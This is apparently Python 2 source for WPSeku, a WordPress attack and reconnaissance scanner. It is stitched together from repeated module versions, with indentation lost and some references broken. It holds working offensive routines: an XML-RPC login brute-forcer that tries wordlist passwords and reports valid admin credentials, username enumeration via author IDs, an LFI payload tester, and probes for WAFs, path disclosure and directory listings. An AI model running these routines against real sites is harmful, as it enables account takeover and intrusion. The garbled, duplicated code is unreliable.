def run(self, content):
waf = ""
try:
if re.search('/wp-content/plugins/wordfence/', content):
waf += "Wordfence Security"
elif re.search('/wp-content/plugins/bulletproof-security/',
content):
waf += "BulletProof Security"
elif re.search('/wp-content/plugins/sucuri-scanner/', content):
waf += "Sucuri Security"
elif re.search('/wp-content/plugins/better-wp-security/', content):
waf += "Better WP Security"
elif re.search('/wp-content/plugins/wp-security-scan/', content):
waf += "Acunetix WP SecurityScan"
elif re.search(
'/wp-content/plugins/all-in-one-wp-security-and-firewall/',
content):
waf += "All In One WP Security & Firewall"
elif re.search('/wp-content/plugins/6scan-protection/', content):
waf += "6Scan Security"
if waf != "":
wpprint.wpprint().plus('Detect firewall: {}'.format(waf))
except Exception, e:
pass
class wpplugin:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie):
self.url = url
self.cookie = cookie
self.agent = agent
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
wpplugin.out.test('Passive enumerate plugins..')
try:
url = wpplugin.chk.path(self.url,'')
resp = self.req.send(url,c=self.cookie)
plugins = re.findall(r'/wp-content/plugins/(.+?)/',resp.content)
plugin = []
for pl in plugins:
if pl not in plugin:
plugin.append(pl)
if plugin != []:
if len(plugin) == 1:
wpplugin.out.plus('Name: {}'.format(plugin[0]))
self.changelog(plugin[0])
self.fullpathdisc(plugin[0])
self.license(plugin[0])
self.listing(plugin[0])
self.readme(plugin[0])
self.dbwpscan(plugin[0])
elif len(plugin) > 1:
for pl in plugin:
wpplugin.out.plus('Name: {}'.format(pl))
self.changelog(pl)
self.fullpathdisc(pl)
self.license(pl)
self.listing(pl)
self.readme(pl)
self.dbwpscan(pl)
elif themes == None:
wpplugin.out.warning('Not found themes..')
except Exception,e:
pass
class wpusers:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
wpusers.out.test('Enumerate users..')
users = []
df_users = []
for x in range(0, 15):
path = "/?author={}".format(str(x))
try:
url = wpusers.chk.path(self.url, path)
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200:
author = re.findall(r'/author/(.+?)/', resp.content)
if len(author) == 1:
if author[0] not in df_users:
df_users.append(author[0])
elif len(author) > 1:
for i in author:
if i[0] not in df_users:
df_users.append(author[0])
except Exception, e:
pass
for i in df_users:
if i not in users:
users.append(i)
if users != []:
for user in xrange(len(users)):
if '%20' in users[user][0]:
wpusers.out.more(' ID: {} - Login: {}'.format(
user, users[user].replace('%20', ' ')))
else:
wpusers.out.more(' ID: {} - Login: {}'.format(
user, users[user]))
elif users == None:
wpusers.out.warning('Not found users :(')
class wpchangelog:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self,agent,proxy,redirect,url):
self.url = url
self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect)
def run(self,theme):
files = ['changelog.txt','changelog.md','CHANGELOG.md','CHANGELOG.txt']
for i in files:
try:
url = self.check.checkurl(self.url,'/wp-content/themes/%s/%s'%(theme,i))
resp = self.req.send(url)
if resp.read() and resp.getcode() == 200:
self.printf.ipri('Changelog: %s'%(url),color="g")
except Exception as error:
pass
class wpvuln:
printf = wpprint.wpprint()
def run(self, version):
try:
v1, v2, v3 = [x.split('.') for x in version][0]
self.vers = v1 + v2 + v3
except ValueError:
try:
v1, v2 = [x.split('.') for x in version][0]
self.vers = v1 + v2
except ValueError:
self.vers = version[0]
try:
req = requests.packages.urllib3.disable_warnings()
req = requests.get("https://wpvulndb.com/api/v2/wordpresses/" +
self.vers,
headers={'User-agent': 'Mozilla/5.0'},
verify=False)
j = json.loads(req.content)
print ""
if j[version[0]]["vulnerabilities"]:
for x in range(len(j[version[0]]["vulnerabilities"])):
self.printf.ipri(
"Title: %s" %
(j[version[0]]["vulnerabilities"][x]["title"]),
color="r")
if j[version[0]]["vulnerabilities"][x]["references"]:
for z in range(
len(j[version[0]]["vulnerabilities"][x]
["references"]["url"])):
self.printf.ipri("Reference: %s" %
(j[version[0]]["vulnerabilities"]
[x]["references"]["url"][z]),
color="g")
self.printf.ipri(
"Fixed in: %s" %
(j[version[0]]["vulnerabilities"][x]["fixed_in"]),
color="g")
print ""
else:
self.printf.ipri('Not found vulnerabilities', color="g")
print ""
except Exception as error:
pass
class wpxmlrpc:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie, wlist, user):
self.url = url
self.cookie = cookie
self.wlist = wlist
self.user = user
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
wpxmlrpc.out.plus('Bruteforcing login via xmlrpc..')
try:
db = open(self.wlist, 'rb')
except Exception, e:
wpxmlrpc.out.warning(e)
dbfiles = [file.split('\n') for file in db]
for passwd in dbfiles:
payload = """<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value><string>""" + self.user + """</string></value></param>
<param><value><string>""" + str(
passwd[0]) + """</string></value></param></params>
</methodCall>"""
url = wpxmlrpc.chk.path(self.url, '/xmlrpc.php')
resp = self.req.send(url, m="POST", p=payload, c=self.cookie)
if re.search('<name>isAdmin</name><value><boolean>0</boolean>',
resp._content):
wpxmlrpc.out.plus(
'Valid credentials: \"{}\" - \"{}\"'.format(
self.user, passwd[0]))
elif re.search(
'<name>isAdmin</name><value><boolean>1</boolean>',
resp.content):
wpxmlrpc.out.plus(
'Valid admin credentials: \"{}\" - \"{}\"'.format(
self.user, passwd[0]))
wpxmlrpc.out.passs()
except Exception, e:
pass
class wpcrossdomain:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self,agent,proxy,redirect,url):
self.url = url
self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect)
def run(self):
self.printf.test('Checking crossdomain...')
try:
url = self.check.checkurl(self.url,'crossdomain.xml')
resp = self.req.send(url)
if resp.read() and resp.getcode() == 200:
self.printf.plus('crossdomain.xml available under: %s'%(url))
else:
self.printf.erro('crossdomain.xml not available')
except Exception as error:
pass
class wpxmlrpc:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self,agent,proxy,redirect,url):
self.url = url
self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect)
def run(self):
self.printf.test("Checking xmlrpc...")
try:
url = self.check.checkurl(self.url,'/xmlrpc.php')
resp = self.req.send(url)
if resp.read() and resp.getcode() == 405:
self.printf.plus('XML-RPC Interface available under: %s'%(url))
else:
self.printf.erro('XML-RPC not available')
except Exception as error:
pass
class wpfpd:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self,agent,proxy,redirect,url):
self.url = url
self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect)
def run(self):
self.printf.test('Checking Full Path Disclosure...')
try:
url = self.check.checkurl(self.url,'/wp-includes/rss-functions.php')
resp = self.req.send(url)
if re.search('Fatal error',resp.read()):
self.printf.erro('Full Path Disclosure: %s'%(url))
else:
self.printf.erro('Full Path Disclosure not available')
except Exception as error:
pass
class wplicense:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test("Checking license...")
try:
url = self.check.checkurl(self.url, '/license.txt')
resp = self.req.send(url)
if resp.read() and resp.getcode() == 200:
self.printf.plus('license.txt available under: %s' % (url))
else:
self.printf.erro('license.txt not available')
except Exception as error:
pass
class wpusers:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test("Enumeration usernames...")
l = []
for x in range(0, 15):
try:
url = self.check.checkurl(self.url, '/?author=%s' % x)
resp = self.req.send(url)
if resp.getcode() == 200:
html = resp.read()
login = re.findall('/author/(.+?)/', html)
l.append(login)
except Exception as error:
print error
login_new = []
for i in l:
if i not in login_new:
login_new.append(i)
##################
try:
if login_new != []:
for a in range(len(login_new)):
if "%20" in login_new[a][0]:
self.printf.ipri(
" ID: %s | Login: %s" %
(a, login_new[a][0].replace('%20', ' ')),
color="g")
else:
self.printf.ipri(" ID: %s | Login: %s" %
(a, login_new[a][0]),
color="g")
print ""
if login_new == []:
self.printf.ipri("Not found usernames", color="r")
except Exception as error:
self.printf.ipri("Not found usernames", color="r")
class wplicense:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self, plugin):
files = ['license.txt', 'license.md', 'LICENSE.md', 'LICENSE.txt']
for i in files:
try:
url = self.check.checkurl(
self.url, 'wp-content/plugins/%s/%s' % (plugin, i))
resp = self.req.send(url)
if resp.read() and resp.getcode() == 200:
self.printf.ipri('License: %s' % (url), color="g")
except Exception as error:
pass
class wpxmlrpc:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url, cookie, wordlist, user):
self.url = url
self.cookie = cookie
self.wordlist = wordlist
self.user = user
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test('Starting bruteforce login via xmlrpc...')
print ""
passwd = open(self.wordlist, "rb")
for x in passwd:
payload = (
"""<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value><string>""" + self.user + """</string></value></param>
<param><value><string>""" + str(x.split('\n')[0]) +
"""</string></value></param></params></methodCall>""")
self.printf.test("Trying Credentials: \"%s\" - \"%s\"" %
(self.user, x.split('\n')[0]))
try:
url = self.check.checkurl(self.url, 'xmlrpc.php')
resp = self.req.send(url, method="POST", payload=payload)
html = resp.read()
if re.search('<name>isAdmin</name><value><boolean>0</boolean>',
html, re.I):
self.printf.plus('Valid Credentials: \"%s\" - \"%s\"' %
(self.user, x.split('\n')[0]))
elif re.search(
'<name>isAdmin</name><value><boolean>1</boolean>',
html, re.I):
self.printf.plus(
'Valid ADMIN Credentials: \"%s\" - \"%s\"' %
(self.user, x.split('\n')[0]))
break
else:
self.printf.erro('Invalid Credentials: \"%s\" - \"%s\"' %
(self.user, x.split('\n')[0]))
except Exception as error:
pass
class wploginprotection:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test('Checking wp-login protection...')
try:
url = self.check.checkurl(self.url, 'wp-login.php')
resp = self.req.send(url)
if resp.getcode() == 200:
self.printf.plus('wp-login not detect protection')
elif resp.getcode() == 404:
self.printf.erro('wp-login detect protection')
except Exception as error:
pass
class wpwaf:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test('Checking WAF...')
try:
url = self.check.checkurl(self.url, "")
resp = self.req.send(url)
html = resp.read()
if re.search('/wp-content/plugins/wordfence/', html):
self.printf.plus('Firewall Detection: Wordfence Security')
elif re.search('/wp-content/plugins/bulletproof-security/', html):
self.printf.plus('Firewall Detection: BulletProof Security')
elif re.search('/wp-content/plugins/sucuri-scanner/', html):
self.printf.plus('Firewall Detection: Sucuri Security')
elif re.search('/wp-content/plugins/better-wp-security/', html):
self.printf.plus('Firewall Detection: Better WP Security')
elif re.search('/wp-content/plugins/wp-security-scan/', html):
self.printf.plus(
'Firewall Detection: Acunetix WP SecurityScan')
elif re.search(
'/wp-content/plugins/all-in-one-wp-security-and-firewall/',
html):
self.printf.plus(
'Firewall Detection: All In One WP Security & Firewall')
elif re.search('/wp-content/plugins/6scan-protection', html):
self.printf.plus('Firewall Detection: 6Scan Security')
elif re.search('cloudflare-nginx',
resp.info().getheader('server'), re.I):
self.printf.plus('Firewall Detection: CloudFlare')
elif re.search('__cfduid', resp.info().getheader('cookie'), re.I):
self.printf.plus('Firewall Detection: CloudFlare')
else:
self.printf.erro('No Firewall Detected')
except Exception as error:
pass
class wprobots:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test("Checking robots...")
try:
url = self.check.checkurl(self.url, '/robots.txt')
resp = self.req.send(url)
html = resp.read()
if html and resp.getcode() == 200:
self.printf.plus('robots.txt available under: %s' % (url))
print "\r\n%s\n" % (html)
elif html == "":
self.printf.erro('robots.txt not available')
except Exception as error:
pass
class wpfpd:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
try:
url = wpfpd.chk.path(self.url,'/wp-includes/rss-functions.php')
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if re.search(r'Fatal error',resp._content):
wpfpd.out.plus('Full Path Disclosure: {}'.format(resp.url))
except Exception,e:
pass
class wplisting:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self, plugin):
files = [
"/js", "/css", "/images", "/inc", "/admin", "/src", "/widgets",
"/lib", "/assets", "/includes", "/logs", "/vendor", "/core"
]
for i in files:
try:
url = self.check.checkurl(
self.url, 'wp-content/plugins/%s/%s' % (plugin, i))
resp = self.req.send(url)
if re.search('Index of', resp.read()):
self.printf.ipri('Listing: %s' % (url), color="g")
except Exception as error:
pass
class fingerprint:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
resp = self.req.send(self.url, c=self.cookie)
server.wpserver().run(resp.headers)
waf.wpwaf().run(resp._content)
headers.wpheaders().run(resp.headers)
wpprint.wpprint().passs()
except Exception, e:
pass
class wpvuln:
printf = wpprint.wpprint()
def run(self, plugin):
try:
req = requests.packages.urllib3.disable_warnings()
req = requests.get("https://www.wpvulndb.com/api/v2/plugins/" +
plugin,
headers={'User-agent': 'Mozilla/5.0'},
verify=False)
j = json.loads(req.content, "utf-8")
if j[plugin]:
if j[plugin]["vulnerabilities"]:
for x in range(len(j[plugin]["vulnerabilities"])):
print ""
self.printf.ipri(
'Title: %s' %
(j[plugin]["vulnerabilities"][x]['title']),
color="r")
if j[plugin]["vulnerabilities"][x]["references"][
"url"]:
for z in range(
len(j[plugin]["vulnerabilities"][x]
["references"]["url"])):
self.printf.ipri('Reference: %s' %
(j[plugin]["vulnerabilities"]
[x]["references"]["url"][z]),
color="g")
self.printf.ipri(
'Fixed in: %s' %
(j[plugin]["vulnerabilities"][x]["fixed_in"]),
color="g")
else:
self.printf.ipri('Not found vulnerabilities', color="g")
else:
self.printf.ipri('Not found vulnerabilities', color="g")
except Exception as error:
self.printf.ipri('Not found vulnerabilities', color="g")
class wplfi:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url, method, payload):
self.url = url
self.method = method
self.payload = payload
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test('Testing LFI vulns...')
print ""
params = dict([x.split("=") for x in self.payload.split("&")])
param = {}
db = open("data/wplfi.txt", "rb")
file = [x.split("\n") for x in db]
try:
for item in params.items():
for x in file:
param[item[0]] = item[1].replace(item[1], x[0])
enparam = urllib.urlencode(param)
url = self.check.checkurl(self.url, "")
resp = self.req.send(url, self.method, enparam)
if re.search('define (^\S*)',
resp.read()) and resp.getcode() == 200:
self.printf.erro(
"[%s][%s][vuln] %s" %
(resp.getcode(), self.method, resp.geturl()))
else:
self.printf.plus(
"[%s][%s][not vuln] %s" %
(resp.getcode(), self.method, resp.geturl()))
param[item[0]] = item[1].replace(x[0], item[1])
except Exception as error:
pass
class wpxmlrpc:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
url = wpxmlrpc.chk.path(self.url, '/xmlrpc.php')
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 405 and resp._content != None:
if resp.url == url:
wpxmlrpc.out.plus(
'XML-RPC Interface available under: {}'.format(
resp.url))
except Exception, e:
pass
class wpfpd:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self, theme):
file = [
"/404.php", "/archive.php", "/author.php", "/comments.php",
"/footer.php", "/functions.php", "/header.php", "/image.php",
"/page.php", "/search.php", "/single.php", "/archive.php"
]
for i in file:
try:
url = self.check.checkurl(
self.url, "/wp-content/themes/%s%s" % (theme, i))
resp = self.req.send(url)
if re.search('Fatal error', resp.read()):
self.printf.ipri('Full Path Disclosure: %s' % (url),
color="r")
except Exception as error:
pass
class wpheaders:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect)
def run(self):
self.printf.test("Interesting headers...")
print ""
try:
url = self.check.checkurl(self.url, '')
r = self.req.send(url)
if r.info().getheader('accept-charset'):
print 'Accept-Charset: %s' % (
r.info().getheader('accept-charset'))
if r.info().getheader('accept-encoding'):
print 'Accept-Encoding: %s' % (
r.info().getheader('accept-encoding'))
if r.info().getheader('accept-language'):
print 'accept-language: %s' % (
r.info().getheader('accept-language'))
if r.info().getheader('accept-ranges'):
print 'Accept-Ranges: %s' % (
r.info().getheader('accept-ranges'))
if r.info().getheader('access-control-allow-credentials'):
print 'Access-Control-Allow-Credentials: %s' % (
r.info().getheader('access-control-allow-credentials'))
if r.info().getheader('access-control-allow-headers'):
print 'Access-Control-Allow-Headers: %s' % (
r.info().getheader('access-control-allow-headers'))
if r.info().getheader('access-control-allow-methods'):
print 'Access-Control-Allow-Methods: %s' % (
r.info().getheader('access-control-allow-methods'))
if r.info().getheader('access-control-allow-origin'):
print 'Access-Control-Allow-Origin: %s' % (
r.info().getheader('access-control-allow-origin'))
if r.info().getheader('access-control-expose-headers'):
print 'Access-Control-Expose-Headers: %s' % (
r.info().getheader('access-control-expose-headers'))
if r.info().getheader('access-control-max-age'):
print 'Access-Control-Max-Age: %s' % (
r.info().getheader('access-control-max-age'))
if r.info().getheader('age'):
print 'Age: %s' % (r.info().getheader('age'))
if r.info().getheader('allow'):
print 'Allow: %s' % (r.info().getheader('allow'))
if r.info().getheader('alternates'):
print 'Alternates: %s' % (r.info().getheader('alternates'))
if r.info().getheader('authorization'):
print 'Authorization: %s' % (
r.info().getheader('authorization'))
if r.info().getheader('cache-control'):
print 'Cache-Control: %s' % (
r.info().getheader('cache-control'))
if r.info().getheader('connection'):
print 'Connection: %s' % (r.info().getheader('connection'))
if r.info().getheader('content-encoding'):
print 'Content-Encoding: %s' % (
r.info().getheader('content-encoding'))
if r.info().getheader('content-language'):
print 'Content-Language: %s' % (
r.info().getheader('content-language'))
if r.info().getheader('content-length'):
print 'Content-Length: %s' % (
r.info().getheader('content-length'))
if r.info().getheader('content-location'):
print 'Content-Location: %s' % (
r.info().getheader('content-location'))
if r.info().getheader('content-md5'):
print 'Content-md5: %s' % (r.info().getheader('content-md5'))
if r.info().getheader('content-range'):
print 'Content-Range: %s' % (
r.info().getheader('content-range'))
if r.info().getheader('content-security-policy'):
print 'Content-Security-Policy: %s' % (
r.info().getheader('content-security-policy'))
if r.info().getheader('content-security-policy-report-only'):
print 'Content-Security-Policy-Report-Only: %s' % (
r.info().getheader('content-security-policy-report-only'))
if r.info().getheader('content-type'):
print 'Content-Type: %s' % (r.info().getheader('content-type'))
if r.info().getheader('dasl'):
print 'Dasl: %s' % (r.info().getheader('dasl'))
if r.info().getheader('date'):
print 'Date: %s' % (r.info().getheader('date'))
if r.info().getheader('dav'):
print 'Dav: %s' % r.info().getheader('dav')
if r.info().getheader('etag'):
print 'Etag: %s' % (r.info().getheader('etag'))
if r.info().getheader('from'):
print 'From: %s' % (r.info().getheader('from'))
if r.info().getheader('host'):
print 'Host: %s' % (r.info().getheader('host'))
if r.info().getheader('keep-alive'):
print 'Keep-Alive: %s' % (r.info().getheader('keep-alive'))
if r.info().getheader('last-modified'):
print 'Last-Modified: %s' % (
r.info().getheader('last-modified'))
if r.info().getheader('location'):
print 'Location: %s' % (r.info().getheader('location'))
if r.info().getheader('max-forwards'):
print 'Max-Forwards: %s' % (r.info().getheader('max-forwards'))
if r.info().getheader('persistent-auth'):
print 'Persistent-Auth: %s' % (
r.info().getheader('persistent-auth'))
if r.info().getheader('pragma'):
print 'Pragma: %s' % (r.info().getheader('pragma'))
if r.info().getheader('proxy-authenticate'):
print 'Proxy-Authenticate: %s' % (
r.info().getheader('proxy-authenticate'))
if r.info().getheader('proxy-authorization'):
print 'Proxy-Authorization: %s' % (
r.info().getheader('proxy-authorization'))
if r.info().getheader('proxy-connection'):
print 'Proxy-Connection: %s' % (
r.info().getheader('proxy-connection'))
if r.info().getheader('public'):
print 'Public: %s' % (r.info().getheader('public'))
if r.info().getheader('range'):
print 'Range: %s' % (r.info().getheader('range'))
if r.info().getheader('referer'):
print 'Referer: %s' % (r.info().getheader('referer'))
if r.info().getheader('server'):
print 'Server: %s' % (r.info().getheader('server'))
if r.info().getheader('set-cookie'):
print 'Set-Cookie: %s' % (r.info().getheader('set-cookie'))
if r.info().getheader('status'):
print 'Status: %s' % (r.info().getheader('status'))
if r.info().getheader('strict-transport-security'):
print 'Strict-Transport-Security: %s' % (
r.info().getheader('strict-transport-security'))
if r.info().getheader('transfer-encoding'):
print 'Transfer-Encoding: %s' % (
r.info().getheader('transfer-encoding'))
if r.info().getheader('upgrade'):
print 'Upgrade: %s' % (r.info().getheader('upgrade'))
if r.info().getheader('vary'):
print 'Vary: %s' % (r.info().getheader('vary'))
if r.info().getheader('via'):
print 'Via: %s' % (r.info().getheader('via'))
if r.info().getheader('warning'):
print 'Warning: %s' % (r.info().getheader('warning'))
if r.info().getheader('www-authenticate'):
print 'www-Authenticate: %s' % (
r.info().getheader('www-authenticate'))
if r.info().getheader('x-content-security-policy'):
print 'X-Content-Security-Policy: %s' % (
r.info().getheader('x-content-security-policy'))
if r.info().getheader('x-content-type-options'):
print 'X-Content-Type-Options: %s' % (
r.info().getheader('x-content-type-options'))
if r.info().getheader('x-frame-options'):
print 'X-Frame-Options: %s' % (
r.info().getheader('x-frame-options'))
if r.info().getheader('x-id'):
print 'X-Id: %s' % (r.info().getheader('x-id'))
if r.info().getheader('x-mod-pagespeed'):
print 'X-Mod-Pagespeed: %s' % (
r.info().getheader('x-mod-pagespeed'))
if r.info().getheader('x-pad'):
print 'X-Pad: %s' % (r.info().getheader('x-pad'))
if r.info().getheader('x-page-speed'):
print 'X-Page-Speed: %s' % (r.info().getheader('x-page-speed'))
if r.info().getheader('x-permitted-cross-domain-policies'):
print 'X-Permitted-Cross-Domain-Policies: %s' % (
r.info().getheader('x-permitted-cross-domain-policies'))
if r.info().getheader('x-pingback'):
print 'X-Pingback: %s' % (r.info().getheader('x-pingback'))
if r.info().getheader('x-powered-by'):
print 'X-Powered-By: %s' % (r.info().getheader('x-powered-by'))
if r.info().getheader('x-robots-tag'):
print 'X-Robots-Tag: %s' % (r.info().getheader('x-robots-tag'))
if r.info().getheader('x-ua-compatible'):
print 'X-UA-Compatible: %s' % (
r.info().getheader('x-ua-compatible'))
if r.info().getheader('x-varnish'):
print 'X-Varnish: %s' % (r.info().getheader('x-varnish'))
if r.info().getheader('x-xss-protection'):
print 'X-XSS-Protection: %s' % (
r.info().getheader('x-xss-protection'))
except Exception as error:
pass
print ""
class wptheme:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redirect=redirect,
url=url)
self.wpch = wpchangelog.wpchangelog(agent=agent,
proxy=proxy,
redirect=redirect,
url=url)
self.wpfpd = wpfpd.wpfpd(agent=agent,
proxy=proxy,
redirect=redirect,
url=url)
self.wpli = wplicense.wplicense(agent=agent,
proxy=proxy,
redirect=redirect,
url=url)
self.wplis = wplisting.wplisting(agent=agent,
proxy=proxy,
redirect=redirect,
url=url)
self.wprea = wpreadme.wpreadme(agent=agent,
proxy=proxy,
redirect=redirect,
url=url)
self.wpst = wpstyle.wpstyle(agent=agent,
proxy=proxy,
redirect=redirect,
url=url)
def run(self):
self.printf.test('Enumeration themes...')
try:
url = self.check.checkurl(self.url, '')
resp = self.req.send(url)
theme = re.findall('/wp-content/themes/(.+?)/', resp.read())
new = []
for i in theme:
if i not in new:
new.append(i)
if new != []:
for c in range(len(new)):
print ""
self.printf.ipri('Name: %s' % (new[c]), color="g")
self.info(new[c])
self.wpst.run(new[c])
self.wpch.run(new[c])
self.wpfpd.run(new[c])
self.wpli.run(new[c])
self.wplis.run(new[c])
self.wprea.run(new[c])
wpvuln().run(new[c])
print ""
else:
self.printf.ipri('Not found themes', color="g")
except Exception as error:
pass
def info(self, theme):
try:
url = self.check.checkurl(
self.url, "/wp-content/themes/%s/%s" % (theme, "style.css"))
resp = self.req.send(url)
html = resp.read()
self.printf.ipri('Theme Name: %s' %
(re.findall("Theme Name: (\w+)", html)[0]),
color="g")
self.printf.ipri('Theme URL: %s' %
(re.findall("Theme URI: (\S+)", html)[0]),
color="g")
self.printf.ipri('Author: %s' %
(re.findall("Author: (\S+)", html)[0]),
color="g")
self.printf.ipri('Author URL: %s' %
(re.findall("Author URI: (\S+)", html)[0]),
color="g")
self.printf.ipri(
'Version: %s' %
(re.findall("Version: (\d+.\d+[.\d+]*)", html)[0]),
color="g")
except Exception as error:
pass
class wpversion:
check = wphttp.check()
printf = wpprint.wpprint()
def __init__(self, agent, proxy, redirect, url):
self.url = url
self.req = wphttp.wphttp(agent=agent, redirect=redirect, proxy=proxy)
def run(self):
self.printf.test('Checking wordpress version...')
try:
url = self.check.checkurl(self.url, 'wp-links-opml.php')
resp = self.req.send(url)
vers = re.findall('\S+WordPress/(\d+.\d+[.\d+]*)', resp.read())
if vers:
self.printf.plus('Running WordPress version: %s' % (vers[0]))
wpvuln().run(vers)
except Exception as error:
print error
try:
url = self.check.checkurl(self.url, 'feed')
resp = self.req.send(url)
vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)', resp.read())
if vers:
self.printf.plus('Running WordPress version: %s' %
(vers[0]))
self.wpvuln().run(vers)
except Exception as error:
try:
url = self.check.checkurl(self.url, '/feed/atom')
resp = self.req.send(url)
vers = re.findall(
'<generator uri="http://wordpress.org/" version="(\d+\.\d+[\.\d+]*)"',
resp.read())
if vers:
self.printf.plus('Running WordPress version: %s' %
(vers[0]))
self.wpvuln().run(vers)
except Exception as error:
try:
url = self.check.checkurl(self.url, '/feed/rdf')
resp = self.req.send(url)
vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)',
resp.read())
if vers:
self.printf.plus('Running WordPress version: %s' %
(vers[0]))
self.wpvuln().run(vers)
except Exception as error:
try:
url = self.check.checkurl(self.url,
'/comments/feed')
resp = self.req.send(url)
vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)',
resp.read())
if vers:
self.printf.plus(
'Running WordPress version: %s' %
(vers[0]))
self.wpvuln().run(vers)
except Exception as error:
try:
url = self.check.checkurl(
self.url, 'readme.html')
resp = self.req.send(url)
vers = re.findall(
'.*wordpress-logo.png" /></a>\n.*<br />.* (\d+\.\d+[\.\d+]*)\n</h1>',
resp.read())
if vers:
self.printf.plus(
'Running WordPress version: %s' %
(vers[0]))
self.wpvuln().run(vers)
except Exception as error:
try:
url = self.check.checkurl(self.url, '')
resp = self.req.send(url)
vers = re.findall(
'<meta name="generator" content="WordPress (\d+\.\d+[\.\d+]*)"',
resp.read())
if vers:
self.printf.plus(
'Running WordPress version: %s' %
(vers[0]))
self.wpvuln().run(vers)
except Exception as error:
self.printf.erro(
'Not found running WordPress version')
class wptheme:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie,result):
self.url = url
self.result = result
self.cookie = cookie
self.agent = agent
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
wptheme.out.test('Passive enumerate themes..')
try:
url = wptheme.chk.path(self.url,'')
resp = self.req.send(url,c=self.cookie)
theme = re.findall(r'/wp-content/themes/(.+?)/',resp.content)
themes = []
self.result.themes = []
for th in theme:
if th not in themes:
themes.append(th)
if themes != []:
if len(themes) == 1:
wptheme.out.plus('Name: {}'.format(themes[0]))
obj = type('', (), {})()
obj.name = themes[0]
self.info(themes[0])
self.style(themes[0])
self.changelog(themes[0], obj)
self.fullpathdisc(themes[0])
self.license(themes[0])
self.listing(themes[0])
self.readme(themes[0], obj)
self.dbwpscan(themes[0], obj)
self.result.themes.append(vars(obj))
elif len(themes) > 1:
for theme in themes:
wptheme.out.plus('Name: {}'.format(theme))
obj = type('', (), {})()
obj.name = theme
self.info(theme)
self.style(theme)
self.changelog(theme, obj)
self.fullpathdisc(theme)
self.license(theme)
self.listing(theme)
self.readme(theme, obj)
self.dbwpscan(theme, obj)
self.result.themes.append(vars(obj))
else:
wptheme.out.warning('Not found themes..')
except Exception,e:
pass
class WPSeku(object):
